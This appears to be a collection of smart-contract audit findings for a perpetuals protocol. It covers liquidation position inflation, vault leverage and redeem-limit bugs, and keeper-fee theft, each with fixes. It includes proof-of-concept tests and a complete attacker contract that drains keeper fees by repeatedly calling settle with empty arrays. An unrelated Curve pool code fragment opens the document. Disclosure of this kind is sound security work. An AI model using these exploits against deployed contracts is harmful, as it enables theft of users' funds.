```\\nFile: Curve2TokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_,\\n DeploymentParams memory params\\n ) SingleSidedLPVaultBase(notional_, params.tradingModule) {\\n CURVE_POOL = params.pool;\\n\\n bool isCurveV2 = false;\\n if (Deployments.CHAIN_ID == Constants.CHAIN_ID_MAINNET) {\\n address[10] memory handlers = \\n Deployments.CURVE_META_REGISTRY.get_registry_handlers_from_pool(address(CURVE_POOL));\\n\\n require(\\n handlers[0] == Deployments.CURVE_V1_HANDLER ||\\n handlers[0] == Deployments.CURVE_V2_HANDLER\\n ); // @dev unknown Curve version\\n isCurveV2 = (handlers[0] == Deployments.CURVE_V2_HANDLER);\\n }\\n IS_CURVE_V2 = isCurveV2;\\n```\\n
Liquidator can liquidate user while increasing user position to any value, stealing all Market funds or bricking the contract
high
When a user is liquidated, there is a check to ensure that after liquidator order executes, `closable = 0`, but this actually doesn't prevent liquidator from increasing user position, and since all position size and collateral checks are skipped during liquidation, this allows malicious liquidator to open position of max possible size (2^62-1) during liquidation. Opening such huge position means the Market contract accounting is basically broken from this point without any ability to restore it. For example, the fee paid (and accumulated by makers) from opening such position will be higher than entire Market collateral balance, so any maker can withdraw full Market balance immediately after this position is settled.\\n`closable` is the value calculated as the maximum possible position size that can be closed even if some pending position updates are invalidated due to invalid oracle version. For example:\\nLatest position = 10\\nPending position [t=200] = 0\\nPending position [t=300] = 1000\\nIn such scenario `closable = 0` (regardless of position size at t=300).\\nWhen position is liquidated (called `protected` in the code), the following requirements are enforced in _invariant():\\n```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n\\nif (\\n !(context.currentPosition.local.magnitude().isZero() && context.latestPosition.local.magnitude().isZero()) && // sender has no position\\n !(newOrder.isEmpty() && collateral.gte(Fixed6Lib.ZERO)) && // sender is depositing zero or more into account, without position change\\n (context.currentTimestamp - context.latestVersion.timestamp >= context.riskParameter.staleAfter) // price is not stale\\n) 
revert MarketStalePriceError();\\n\\nif (context.marketParameter.closed && newOrder.increasesPosition())\\n revert MarketClosedError();\\n\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n\\nif (!newOrder.singleSided(context.currentPosition.local) || !newOrder.singleSided(context.latestPosition.local))\\n revert MarketNotSingleSidedError();\\n\\nif (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n```\\n\\nThe requirements for liquidated positions are:\\nclosable = 0, user position collateral is below maintenance, liquidator withdraws no more than liquidation fee\\nmarket oracle price is not stale\\nfor closed market - order doesn't increase position\\nmaker position doesn't exceed maker limit\\norder and position are single-sided\\nAll the other invariants are skipped for liquidation, including checks for long or short position size and collateral.\\nAs shown in the example above, it's possible for the user to have `closable = 0` while having a new (current) position size of any amount, which makes it possible to successfully liquidate the user while increasing the position size (long or short) to any amount (up to the max `2^62-1` enforced when storing position size values).\\nScenario for opening any position size (oracle granularity = 100): T=1: ETH price = $100. User opens position `long = 10` with collateral = min margin ($350) T=120: Oracle version T=100 is committed, price = $100, user position is settled (becomes latest) ... T=150: ETH price starts moving against the user, so the user tries to close the position calling `update(0,0,0,0,false)` T=205: Current price is $92 and user becomes liquidatable (before the T=200 price is committed, so his close request is still pending). 
Liquidator commits unrequested oracle version T=190, price = $92, user is liquidated while increasing his position: `update(0,2^62-1,0,0,true)` Liquidation succeeds, because user has latest `long = 10`, pending long = 0 (t=200), liquidation pending long = 2^62-1 (t=300). `closable = 0`.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('liquidate with huge open position', async () => {\\nconst positionMaker = parse6decimal('20.000')\\nconst positionLong = parse6decimal('10.000')\\nconst collateral = parse6decimal('1000')\\nconst collateral2 = parse6decimal('350')\\nconst maxPosition = parse6decimal('4611686018427') // 2^62-1\\n\\nconst oracleVersion = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP,\\n valid: true,\\n}\\noracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\noracle.status.returns([oracleVersion, TIMESTAMP + 100])\\noracle.request.returns()\\n\\n// maker\\ndsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\nawait market.connect(userB).update(userB.address, positionMaker, 0, 0, collateral, false)\\n\\n// user opens long=10\\ndsu.transferFrom.whenCalledWith(user.address, market.address, collateral2.mul(1e12)).returns(true)\\nawait market.connect(user).update(user.address, 0, positionLong, 0, collateral2, false)\\n\\nconst oracleVersion2 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 100,\\n valid: true,\\n}\\noracle.at.whenCalledWith(oracleVersion2.timestamp).returns(oracleVersion2)\\noracle.status.returns([oracleVersion2, TIMESTAMP + 200])\\noracle.request.returns()\\n\\n// price moves against user, so he's at the edge of liquidation and tries to close\\n// position: latest=10, pending [t=200] = 0 (closable = 0)\\nawait market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\nconst oracleVersion3 = {\\n price: parse6decimal('92'),\\n timestamp: TIMESTAMP + 190,\\n valid: 
true,\\n}\\noracle.at.whenCalledWith(oracleVersion3.timestamp).returns(oracleVersion3)\\noracle.status.returns([oracleVersion3, TIMESTAMP + 300])\\noracle.request.returns()\\n\\nvar loc = await market.locals(user.address);\\nvar posLatest = await market.positions(user.address);\\nvar posCurrent = await market.pendingPositions(user.address, loc.currentId);\\nconsole.log("Before liquidation. Latest= " + posLatest.long + " current = " + posCurrent.long);\\n\\n// t = 205: price drops to 92, user becomes liquidatable before the pending position oracle version is commited\\n// liquidator commits unrequested price = 92 at oracle version=190, but current timestamp is already t=300\\n// liquidate. User pending positions:\\n// latest = 10\\n// pending [t=200] = 0\\n// current(liquidated) [t=300] = max possible position (2^62-1)\\nawait market.connect(user).update(user.address, 0, maxPosition, 0, 0, true)\\n\\nvar loc = await market.locals(user.address);\\nvar posLatest = await market.positions(user.address);\\nvar posCurrent = await market.pendingPositions(user.address, loc.currentId);\\nconsole.log("After liquidation. Latest= " + posLatest.long + " current = " + posCurrent.long);\\n\\n})\\n```\\n
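The `closable` behavior that enables this can be illustrated with a minimal Python sketch (a simplified model of the running-minimum logic, not the actual Fixed6 accounting):

```python
def closable(latest: int, pendings: list[int]) -> int:
    """Simplified model of Market's closable: the running minimum of position
    magnitude across the latest settled position and all pending updates.
    Increases never restore closability; only decreases reduce it."""
    c = latest
    for magnitude in pendings:
        c = min(c, magnitude)
    return c

# Latest = 10, pending [t=200] = 0, pending liquidation [t=300] = 2**62 - 1:
# the protection invariant sees closable == 0, so the huge open slips through.
assert closable(10, [0, 2**62 - 1]) == 0
```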
When liquidating, the order must decrease the position:\\n```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n- collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n+ collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder))) ||\\n+ newOrder.maker.add(newOrder.long).add(newOrder.short).gte(Fixed6Lib.ZERO)\\n)) revert MarketInvalidProtectionError();\\n```\\n
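A minimal Python sketch of the effect of the added check (hypothetical delta values; the sign convention follows the recommendation's `gte(ZERO)` condition):

```python
def protected_order_allowed(d_maker: int, d_long: int, d_short: int) -> bool:
    """With the recommended check, a protected (liquidation) order passes only
    if the sum of position deltas is negative, i.e. it decreases the position."""
    return (d_maker + d_long + d_short) < 0

assert not protected_order_allowed(0, 2**62 - 1, 0)  # max-size open now rejected
assert protected_order_allowed(0, -10, 0)            # a genuine close still passes
```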
A malicious liquidator can liquidate users while increasing their position to any value, including the max possible 2^62-1, ignoring all collateral and position size checks. This is possible on its own, but a liquidator can also craft such a situation with very high probability. As a result, all users will lose all funds deposited into the Market. For example, the fee paid (and accrued by makers) from the max possible position will exceed the total Market collateral balance, so the first maker will be able to withdraw the entire Market balance; a minimal price change will create a huge profit for the user, exceeding the Market balance (if fee = 0), etc.
```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n\\nif (\\n !(context.currentPosition.local.magnitude().isZero() && context.latestPosition.local.magnitude().isZero()) && // sender has no position\\n !(newOrder.isEmpty() && collateral.gte(Fixed6Lib.ZERO)) && // sender is depositing zero or more into account, without position change\\n (context.currentTimestamp - context.latestVersion.timestamp >= context.riskParameter.staleAfter) // price is not stale\\n) revert MarketStalePriceError();\\n\\nif (context.marketParameter.closed && newOrder.increasesPosition())\\n revert MarketClosedError();\\n\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n\\nif (!newOrder.singleSided(context.currentPosition.local) || !newOrder.singleSided(context.latestPosition.local))\\n revert MarketNotSingleSidedError();\\n\\nif (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n```\\n
Vault leverage can be increased to any value up to the min margin requirement due to incorrect `maxRedeem` calculations with closable and `LEVERAGE_BUFFER`
high
When redeeming from the vault, the maximum amount allowed to be redeemed is limited by the collateral required to keep the minimum vault position size which will remain open due to different factors, including the `closable` value, which is a limitation on how much of the position can be closed given current pending positions. However, when calculating the max redeemable amount, the `closable` value is multiplied by the `LEVERAGE_BUFFER` value (currently 1.2):\\n```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n```\\n\\nThe intention seems to be to allow withdrawing a bit more collateral so that leverage can increase by at most LEVERAGE_BUFFER. However, the math is wrong here, for example:\\nCurrent position = 12, `closable = 10`\\nMax amount allowed to be redeemed is 12 (100% of shares)\\nHowever, when all shares are withdrawn, `closable = 10` prevents full position closure, so the position will remain at 12-10 = 2\\nOnce settled, the user can claim all vault collateral while the vault still has a position of size 2 open. Claiming all collateral will revert due to this line in allocate:\\n```\\n_locals.marketCollateral = strategy.marketContexts[marketId].margin\\n .add(collateral.sub(_locals.totalMargin).muldiv(registrations[marketId].weight, _locals.totalWeight));\\n```\\n\\nSo the user can claim the assets only if the remaining collateral is equal to or greater than the total margin of all markets. This means that the user can put the vault into the max leverage possible, ignoring the vault leverage config (the vault will have an open position of such size that all vault collateral equals the minimum margin requirement to keep such a position open). 
This creates a big risk of vault liquidation and loss of funds for vault depositors.\\nAs seen from the example above, it's possible to put the vault at high leverage only if a user redeems an amount higher than `closable` allows (a redeem amount in the closable..closable * LEVERAGE_BUFFER range). However, since deposits and redeems from the vault are settled later, it's impossible to directly create such a situation (redeemable amount > closable). There is still a way to create such a situation indirectly via the maker limit.\\nScenario:\\nMarket config leverage = 4. Existing deposits = $1K. Existing positions in the underlying market are worth $4K\\nOpen a maker position in the underlying markets such that `makerLimit - currentMaker = $36K`\\nDeposit $11K to the vault (total deposits = $12K). The vault will try to open a position of size = $48K (+$44K), however `makerLimit` will not allow opening the full position, so the vault will only open +$36K (total position $40K)\\nWait until the deposit settles\\nClose the maker position in the underlying markets to free up the maker limit\\nDeposit a minimum amount to the vault from another user. This increases vault positions to $48K (settled = $40K, pending = $48K, `closable` = $40K)\\nRedeem $11K from the vault. This is possible because maxRedeem is `closable/leverage*LEVERAGE_BUFFER` = `$40K/4*1.2` = `$12K`. However, the position change will be limited by `closable`, so the position will be reduced only by $40K (set to $8K).\\nWait until the redeem settles\\nClaim $11K from the vault. 
This leaves the vault with the latest position = $8K, but only with $1K of original deposit, meaning vault leverage is now 8 - twice the value specified by config (4).\\nThis scenario will keep high vault leverage only for a short time until next oracle version, because `claim` will reduce position back to $4K, however this position reduction can also be avoided, for example, by opening/closing positions to make `long-short = maker` or `short-long = maker` in the underlying market(s), thus disallowing the vault to reduce its maker position and keeping the high leverage.\\nThe scenario above is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('increase vault leverage', async () => {\\n console.log("start");\\n\\n async function setOracle(latestTime: BigNumber, currentTime: BigNumber) {\\n await setOracleEth(latestTime, currentTime)\\n await setOracleBtc(latestTime, currentTime)\\n }\\n\\n async function setOracleEth(latestTime: BigNumber, currentTime: BigNumber) {\\n const [, currentPrice] = await oracle.latest()\\n const newVersion = {\\n timestamp: latestTime,\\n price: currentPrice,\\n valid: true,\\n }\\n oracle.status.returns([newVersion, currentTime])\\n oracle.request.whenCalledWith(user.address).returns()\\n oracle.latest.returns(newVersion)\\n oracle.current.returns(currentTime)\\n oracle.at.whenCalledWith(newVersion.timestamp).returns(newVersion)\\n }\\n\\n async function setOracleBtc(latestTime: BigNumber, currentTime: BigNumber) {\\n const [, currentPrice] = await btcOracle.latest()\\n const newVersion = {\\n timestamp: latestTime,\\n price: currentPrice,\\n valid: true,\\n }\\n btcOracle.status.returns([newVersion, currentTime])\\n btcOracle.request.whenCalledWith(user.address).returns()\\n btcOracle.latest.returns(newVersion)\\n btcOracle.current.returns(currentTime)\\n btcOracle.at.whenCalledWith(newVersion.timestamp).returns(newVersion)\\n }\\n\\n async function logLeverage() {\\n // vault collateral\\n var vaultCollateralEth = (await 
market.locals(vault.address)).collateral\\n var vaultCollateralBtc = (await btcMarket.locals(vault.address)).collateral\\n var vaultCollateral = vaultCollateralEth.add(vaultCollateralBtc)\\n\\n // vault position\\n var vaultPosEth = (await market.positions(vault.address)).maker;\\n var ethPrice = (await oracle.latest()).price;\\n var vaultPosEthUsd = vaultPosEth.mul(ethPrice);\\n var vaultPosBtc = (await btcMarket.positions(vault.address)).maker;\\n var btcPrice = (await btcOracle.latest()).price;\\n var vaultPosBtcUsd = vaultPosBtc.mul(btcPrice);\\n var vaultPos = vaultPosEthUsd.add(vaultPosBtcUsd);\\n var leverage = vaultPos.div(vaultCollateral);\\n console.log("Vault collateral = " + vaultCollateral.div(1e6) + " pos = " + vaultPos.div(1e12) + " leverage = " + leverage);\\n }\\n\\n await setOracle(STARTING_TIMESTAMP.add(3600), STARTING_TIMESTAMP.add(3700))\\n await vault.settle(user.address);\\n\\n // put markets at the (limit - 5000) each\\n var makerLimit = (await market.riskParameter()).makerLimit;\\n var makerCurrent = (await market.position()).maker;\\n var maker = makerLimit;\\n var ethPrice = (await oracle.latest()).price;\\n var availUsd = parse6decimal('32000'); // 10/2 * 4\\n var availToken = availUsd.mul(1e6).div(ethPrice);\\n maker = maker.sub(availToken);\\n var makerBefore = makerCurrent;// (await market.positions(user.address)).maker;\\n console.log("ETH Limit = " + makerLimit + " CurrentGlobal = " + makerCurrent + " CurrentUser = " + makerBefore + " price = " + ethPrice + " availToken = " + availToken + " maker = " + maker);\\n for (var i = 0; i < 5; i++)\\n await fundWallet(asset, user);\\n await market.connect(user).update(user.address, maker, 0, 0, parse6decimal('1000000'), false)\\n\\n var makerLimit = (await btcMarket.riskParameter()).makerLimit;\\n var makerCurrent = (await btcMarket.position()).maker;\\n var maker = makerLimit;\\n var btcPrice = (await btcOracle.latest()).price;\\n var availUsd = parse6decimal('8000'); // 10/2 * 4\\n var 
availToken = availUsd.mul(1e6).div(btcPrice);\\n maker = maker.sub(availToken);\\n var makerBeforeBtc = makerCurrent;// (await market.positions(user.address)).maker;\\n console.log("BTC Limit = " + makerLimit + " CurrentGlobal = " + makerCurrent + " CurrentUser = " + makerBeforeBtc + " price = " + btcPrice + " availToken = " + availToken + " maker = " + maker);\\n for (var i = 0; i < 10; i++)\\n await fundWallet(asset, btcUser1);\\n await btcMarket.connect(btcUser1).update(btcUser1.address, maker, 0, 0, parse6decimal('2000000'), false)\\n\\n console.log("market updated");\\n\\n var deposit = parse6decimal('12000')\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n\\n await setOracle(STARTING_TIMESTAMP.add(3700), STARTING_TIMESTAMP.add(3800))\\n await vault.settle(user.address)\\n\\n await logLeverage();\\n\\n // withdraw the blocking amount\\n console.log("reduce maker blocking position to allow vault maker increase")\\n await market.connect(user).update(user.address, makerBefore, 0, 0, 0, false);\\n await btcMarket.connect(btcUser1).update(btcUser1.address, makerBeforeBtc, 0, 0, 0, false);\\n\\n await setOracle(STARTING_TIMESTAMP.add(3800), STARTING_TIMESTAMP.add(3900))\\n\\n // refresh vault to increase position size since it's not held now\\n var deposit = parse6decimal('10')\\n console.log("Deposit small amount to increase position")\\n await vault.connect(user2).update(user2.address, deposit, 0, 0)\\n\\n // now redeem 11000 (which is allowed, but market position will be 2000 due to closable)\\n var redeem = parse6decimal('11500')\\n console.log("Redeeming 11500")\\n await vault.connect(user).update(user.address, 0, redeem, 0);\\n\\n // settle all changes\\n await setOracle(STARTING_TIMESTAMP.add(3900), STARTING_TIMESTAMP.add(4000))\\n await vault.settle(user.address)\\n await logLeverage();\\n\\n // claim those assets we've withdrawn\\n var claim = parse6decimal('11100')\\n console.log("Claiming 11100")\\n await 
vault.connect(user).update(user.address, 0, 0, claim);\\n\\n await logLeverage();\\n})\\n```\\n\\nConsole log from execution of the code above:\\n```\\nstart\\nETH Limit = 1000000000 CurrentGlobal = 200000000 CurrentUser = 200000000 price = 2620237388 availToken = 12212633 maker = 987787367\\nBTC Limit = 100000000 CurrentGlobal = 20000000 CurrentUser = 20000000 price = 38838362695 availToken = 205981 maker = 99794019\\nmarket updated\\nVault collateral = 12000 pos = 39999 leverage = 3333330\\nreduce maker blocking position to allow vault maker increase\\nDeposit small amount to increase position\\nRedeeming 11500\\nVault collateral = 12010 pos = 8040 leverage = 669444\\nClaiming 11100\\nVault collateral = 910 pos = 8040 leverage = 8835153\\n```\\n
The formula allowing LEVERAGE_BUFFER should apply it to the final position size, not to the delta position size (maxRedeem returns the delta to subtract from the current position). Currently the redeem amount is limited by: `closable * LEVERAGE_BUFFER`. Once subtracted from the current position size, we obtain:\\n`maxRedeem = closable * LEVERAGE_BUFFER / leverage`\\n`newPosition = currentPosition - closable`\\n`newCollateral = (currentPosition - closable * LEVERAGE_BUFFER) / leverage`\\n`newLeverage = newPosition / newCollateral = leverage * (currentPosition - closable) / (currentPosition - closable * LEVERAGE_BUFFER)`\\n`= leverage / (1 - (LEVERAGE_BUFFER - 1) * closable / (currentPosition - closable))`\\nAs can be seen, the new leverage can be any amount and the formula doesn't make much sense; it certainly doesn't limit the new leverage factor to LEVERAGE_BUFFER (the denominator can be 0, negative, or any small value, meaning leverage can be as high as you want). What the developers likely wanted is:\\n`newPosition = currentPosition - closable`\\n`newCollateral = newPosition / (leverage * LEVERAGE_BUFFER)`\\n`newLeverage = newPosition / (newPosition / (leverage * LEVERAGE_BUFFER)) = leverage * LEVERAGE_BUFFER`\\nNow, the important part to understand is that it's impossible to calculate the delta collateral simply from the delta position as is done now. 
When we know target newPosition, we can calculate target newCollateral, and then maxRedeem (delta collateral) can be calculated as currentCollateral - newCollateral:\\n`maxRedeem = currentCollateral - newCollateral`\\n`maxRedeem = currentCollateral - newPosition / (leverage * LEVERAGE_BUFFER)`\\nSo the fixed collateral calculation can be something like that:\\n```\\nUFixed6 deltaPosition = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable);\\nUFixed6 targetPosition = marketContext.currentAccountPosition.maker.sub(deltaPosition); // expected ideal position\\nUFixed6 targetCollateral = targetPosition.muldiv(marketContext.latestPrice.abs(), \\n registration.leverage.mul(StrategyLib.LEVERAGE_BUFFER)); // allow leverage to be higher by LEVERAGE_BUFFER\\nUFixed6 collateral = marketContext.local.collateral.sub(targetCollateral) // delta collateral\\n .muldiv(totalWeight, registration.weight); // market collateral => vault collateral\\n```\\n
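The difference between the current and the recommended formulas can be checked numerically (a Python sketch using the report's example numbers):

```python
LEVERAGE_BUFFER = 1.2

def broken_new_leverage(leverage, position, closable):
    """Current code: the buffer scales the *delta* (closable), so collateral
    can be withdrawn past what the remaining position supports."""
    new_pos = position - closable
    new_col = (position - closable * LEVERAGE_BUFFER) / leverage
    return float('inf') if new_col <= 0 else new_pos / new_col

def fixed_new_leverage(leverage, position, closable):
    """Recommendation: the buffer applies to the *final* position's collateral,
    bounding the post-redeem leverage at leverage * LEVERAGE_BUFFER."""
    new_pos = position - closable
    new_col = new_pos / (leverage * LEVERAGE_BUFFER)
    return new_pos / new_col

# Report's example: current position = 12, closable = 10, target leverage = 4
assert broken_new_leverage(4, 12, 10) == float('inf')  # denominator hits 0
assert abs(fixed_new_leverage(4, 12, 10) - 4 * LEVERAGE_BUFFER) < 1e-9
```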
A malicious user can put the vault at very high leverage, breaking an important protocol invariant (leverage not exceeding the target market leverage). This exposes users to a much higher potential loss from price movement due to the high leverage, and to a very high risk of vault liquidation, causing additional loss of funds from liquidation penalties and position re-opening fees.
```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n```\\n
Vault max redeem calculations limit the redeem amount to the smallest position size across underlying markets, which can lead to a very small max redeem amount even in a vault with huge TVL
high
When redeeming from the vault, the maximum amount allowed to be redeemed is limited by the currently opened position in each underlying market (the smallest opened position adjusted for weight). However, if any one market has its maker close to the maker limit, the vault will open a very small position there, limited by the maker limit. But now all redeems will be limited by this very small position for no reason: when almost any amount is redeemed, the vault will attempt to increase (not decrease) its position in such a market, so there is no sense in limiting the redeem amount to the smallest position.\\nThis issue can create huge problems for users with large deposits. For example, if a user has deposited $10M to the vault, but due to one of the underlying markets the max redeem amount is only $1, the user will need to do 10M transactions to redeem his full amount (which will not make sense due to gas).\\nThe vault's `maxRedeem` is calculated for each market as:\\n```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n\\nredemptionAssets = redemptionAssets.min(collateral);\\n```\\n\\n`closable` is limited by the vault's settled and current positions in the market. As can be seen from the calculation, the redeem amount is limited by the vault's position in the market. However, if the position is far from the target due to various market limitations, this doesn't make much sense. 
For example, if the vault has $2M deposits and there are 2 underlying markets, each with weight 1, and:\\nIn Market1 the vault position is worth $1 (target position = $1M)\\nIn Market2 the vault position is worth $1M (target position = $1M)\\nThe `maxRedeem` will be limited to $1, even though redeeming any amount up to $999999 will only make the vault attempt to increase its position in Market1 rather than decrease it.\\nThe opposite situation is also possible, when the current position is higher than the target position (due to LEVERAGE_BUFFER). This will make maxRedeem too high. For example, similar to the previous example, but:\\nIn Market1 the vault position is worth $1.2M (target position = $1M)\\nIn Market2 the vault position is worth $1.2M (target position = $1M)\\nThe `maxRedeem` will be limited to $1.44M (due to LEVERAGE_BUFFER), without even comparing the current collateral (which is just $1M per market), based only on position size.
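The first example can be sketched numerically (a simplified Python model; the closable and LEVERAGE_BUFFER terms are omitted, and the leverage value is hypothetical):

```python
def max_redeem(markets, total_weight):
    """Each market caps redeemable collateral by its *current* position value;
    the vault-wide cap is the minimum across markets."""
    cap = float('inf')
    for position_value, leverage, weight in markets:
        cap = min(cap, position_value / leverage * total_weight / weight)
    return cap

# Market1 stuck near the maker limit with a $1 position, Market2 at $1M,
# equal weights, leverage 2: a vault with ~$2M TVL can redeem only ~$1 per call.
markets = [(1, 2, 1), (1_000_000, 2, 1)]
assert max_redeem(markets, total_weight=2) == 1.0
```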
Consider calculating max redeem by comparing target position vs current position and then target collateral vs current collateral, instead of using only the current position for calculations. This might be somewhat complex, because it will require re-calculating allocation amounts to compare target vs current position. Possibly max redeem should not be limited as a separate check, but rather as part of the `allocate()` calculations (reverting if the actual leverage is too high in the end).
When the vault's position is small in any underlying market due to the maker limit, the max redeem amount in the vault will be very small. This will force users with large deposits to use a lot of transactions to redeem (losing funds to gas), or it might even be practically impossible (if, for example, a user has a deposit of $10M and max redeem = $1); in such a case redeems are essentially broken.
```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n\\nredemptionAssets = redemptionAssets.min(collateral);\\n```\\n
Attacker can call `KeeperFactory#settle` with empty arrays as input parameters to steal all keeper fees
high
Anyone can call `KeeperFactory#settle`, inputting empty arrays as parameters, and the call will succeed, with the caller receiving a fee.\\nAn attacker can perform this attack many times within a loop to steal ALL keeper fees from the protocol.\\nExpected Workflow:\\nUser calls `Market#update` to open a new position\\nMarket calls `Oracle#request` to request a new oracleVersion\\nThe User's account gets added to a callback array of the market\\nOnce a new oracleVersion gets committed, keepers can call `KeeperFactory#settle`, which will call `Market#update` on accounts in the Market's callback array, and pay the keeper (i.e. caller) a fee.\\nThe `KeeperFactory#settle` call will fail if there is no account to settle (i.e. if the callback array is empty)\\nAfter settling an account, it gets removed from the callback array\\nThe issue:\\nHere is the KeeperFactory#settle function:\\n```\\nfunction settle(bytes32[] memory ids, IMarket[] memory markets, uint256[] memory versions, uint256[] memory maxCounts)\\n external\\n keep(settleKeepConfig(), msg.data, 0, "")\\n{\\n if (\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n )\\n revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\n\\nAs we can see, the function does not check whether the array length is 0, so if a user inputs empty arrays, the for loop will not be entered, but the keeper still receives a fee via the `keep` modifier.\\nAn attacker can have a contract perform the attack multiple times in a loop to drain all fees:\\n```\\ninterface IERC20{\\n function transfer(address to, uint256 amount) external returns (bool);\\n function balanceOf(address account) external view returns (uint256);\\n}\\n\\ninterface IKeeperFactory{\\n function settle(bytes32[] memory ids,IMarket[] memory markets,uint256[] memory versions,uint256[] memory maxCounts\\n ) external;\\n}\\n\\ninterface IMarket{\\n function update() external;\\n}\\n\\ncontract AttackContract{\\n\\n address public attacker;\\n address public keeperFactory;\\n IERC20 public keeperToken;\\n\\n constructor(address perennialDeployedKeeperFactory, IERC20 _keeperToken){\\n attacker=msg.sender;\\n keeperFactory=perennialDeployedKeeperFactory;\\n keeperToken=_keeperToken;\\n }\\n\\n function attack()external{\\n require(msg.sender==attacker,"not allowed");\\n\\n bool canSteal=true;\\n\\n // empty arrays as parameters\\n bytes32[] memory ids = new bytes32[](0);\\n IMarket[] memory markets = new IMarket[](0);\\n uint256[] memory versions = new uint256[](0);\\n uint256[] memory maxCounts = new uint256[](0);\\n\\n // perform attack in a loop till all funds are drained or the call reverts\\n while(canSteal){\\n try IKeeperFactory(keeperFactory).settle(ids,markets,versions,maxCounts){\\n //\\n }catch{\\n canSteal=false;\\n }\\n }\\n keeperToken.transfer(msg.sender, keeperToken.balanceOf(address(this)));\\n }\\n}\\n```\\n
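The core of the issue, that four empty arrays trivially pass the length checks, can be mirrored in a short Python sketch (the calldata-stuffing check is omitted):

```python
def settle_check(ids, markets, versions, max_counts):
    """Mirror of KeeperFactory.settle's length validation; returns the number
    of oracles actually settled."""
    if (len(ids) != len(markets)
            or len(ids) != len(versions)
            or len(ids) != len(max_counts)):
        raise ValueError("KeeperFactoryInvalidSettleError")
    settled = 0
    for _ in range(len(ids)):
        settled += 1  # stands in for IKeeperOracle.settle(...)
    return settled

# Four empty arrays have equal lengths, so validation passes, the loop body
# never runs, and the keep modifier still pays the caller a fee.
assert settle_check([], [], [], []) == 0
```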
Within KeeperFactory#settle function, revert if ids.length==0:\\n```\\nfunction settle(\\n bytes32[] memory ids,\\n IMarket[] memory markets,\\n uint256[] memory versions,\\n uint256[] memory maxCounts\\n)external keep(settleKeepConfig(), msg.data, 0, "") {\\n if (\\n++++ ids.length==0 ||\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n ) revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\n
All keeper fees can be stolen from the protocol, and there will be no way to incentivize keepers to commit requested oracle versions or perform other keeper tasks
